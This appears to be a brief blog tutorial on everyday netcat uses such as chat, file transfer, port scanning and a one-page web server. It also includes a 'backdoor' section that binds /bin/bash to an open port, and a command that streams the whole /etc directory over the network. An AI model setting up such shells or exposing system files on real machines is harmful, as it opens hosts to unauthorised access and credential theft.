Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
In this little guide I’ll quickly cover some very helpful usage’s of netcat .
The simplest example of netcat usage is to create a server-client chat system. In the following example it is assumed that the machine that creates the listening socket (server) has the 192.168.0.1 IP address. So, create the chat server on this machine and set it to listen to 12345 TCP port:
# nc -lp 12345
# nc -l 12345
If you now connect to port 12345 on that host, everything you type will be sent to the other party, which leads us to using netcat as a chat server.
Connect to it from another machine by entering this command:
# nc 192.168.0.1 12345
Now both parties can chat!
Netcat can be a port scanner. It does not have as many features as say nmap, but if you just want to see what ports are open on a given machine, you can simply do:
# nc -vzw 1 localhost 1-1000
Let’s say you want to transfer a file from machine A to machine B . you can use netcat as a file transfer software.
On machine A do the following, where 12345 is some unused port on which you want to send the file:
# nc -lp 12345 < myfile.tar.bz2
# nc -l 12345 < myfile.tar.bz2
then go to the machine B and run this command: (192.168.0.1 is machine A IP address)
# nc 192.168.0.1 12345 > myfile.tar.bz2
# tar -czf - /etc/ | nc -lp 12345
# nc 192.168.0.1 12345 > mybackup.tar.gz
Simple Single page Web Server:
# while true; do nc -lp 8080 -q 1 < test.html; done
now if you connect to http://YOUR-IP-ADDRESS:8080 , you will see contents of test.html page .
Netcat as a Backdoor !!!
netcat can be used as a backdoor! You can specify the shell (or for that matter any executable) you want netcat to run at a successful connection with the -e parameter:
# nc -lp 54321 -e /bin/bash
now if you connect to the port 54321 , you will have a shell :
Getting System Information
# while true; do nc -lp 12345 -e /usr/bin/uptime; done
The user who wants to obtain system information has to issue the following command:
# nc 192.168.0.1 12345